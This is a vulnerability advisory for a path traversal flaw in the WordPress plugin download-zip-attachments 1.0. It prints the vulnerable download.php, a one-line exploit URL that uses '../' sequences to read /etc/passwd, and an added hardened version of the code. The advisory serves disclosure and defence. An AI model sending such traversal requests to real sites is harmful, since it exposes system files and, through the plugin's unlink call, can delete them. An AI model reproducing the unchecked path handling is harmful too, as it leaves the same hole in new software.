Download Zip Attachments 1.0 File Download

2015.06.28
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129

Description: Download all attachments from the post into a zip file.

Vulnerability: download-zip-attachments/download.php makes no checks to verify that the download path is within the specified upload directory.

<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
    define('WP_USE_THEMES', false);
    require('../../../wp-load.php');
    require "create_zip_file.php";
    $uploads = wp_upload_dir();
    // The user-controlled 'File' parameter is appended to the upload path
    // unvalidated, so "../" sequences escape the upload directory.
    $tmp_location = $uploads['path']."/".$_REQUEST['File'];
    //echo $tmp_location;
    $zip = new CreateZipFile;
    $zip->forceDownload($tmp_location,false);
    unlink($tmp_location);
    exit;
}

CVEID: 2015-4704
OSVDB:
Exploit Code:
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
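A hardened form of download.php, written here as an added example and not the vendor's patch. It assumes the same WordPress context as the original (wp-load.php, the CreateZipFile class, wp_upload_dir() and status_header()), and it restricts the name to a plain file inside the upload directory before the path reaches both forceDownload() and unlink(), since the original passes the same unchecked path to both.

```php
<?php
// Hardened variant of download-zip-attachments/download.php (added example).
if (isset($_REQUEST['File']) && $_REQUEST['File'] !== '') {
    define('WP_USE_THEMES', false);
    require '../../../wp-load.php';
    require 'create_zip_file.php';

    $uploads  = wp_upload_dir();
    $base_dir = realpath($uploads['path']);   // canonical upload directory

    // The plugin only ever writes its zip directly into the upload directory,
    // so a bare file name is all that is legitimate: reject anything with a
    // directory component, traversal sequence or embedded NUL byte.
    $name = (string) $_REQUEST['File'];
    if ($base_dir === false
        || $name !== basename($name)
        || strpos($name, "\0") !== false) {
        status_header(400);
        exit('Invalid file name');
    }

    // Resolve the final path (follows symlinks) and confirm it is still a
    // regular .zip file located under the upload directory.
    $target = realpath($base_dir . DIRECTORY_SEPARATOR . $name);
    if ($target === false
        || strpos($target, $base_dir . DIRECTORY_SEPARATOR) !== 0
        || !is_file($target)
        || strtolower(pathinfo($target, PATHINFO_EXTENSION)) !== 'zip') {
        status_header(404);
        exit('File not found');
    }

    $zip = new CreateZipFile;
    $zip->forceDownload($target, false);
    unlink($target);   // now limited to the validated file in the upload dir
    exit;
}
```

The realpath() comparison is the check that matters: it is done on the resolved path, so encoded or symlinked traversal is caught even if the basename() test were loosened later.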

References:

http://www.vapid.dhs.org/advisory.php?v=129
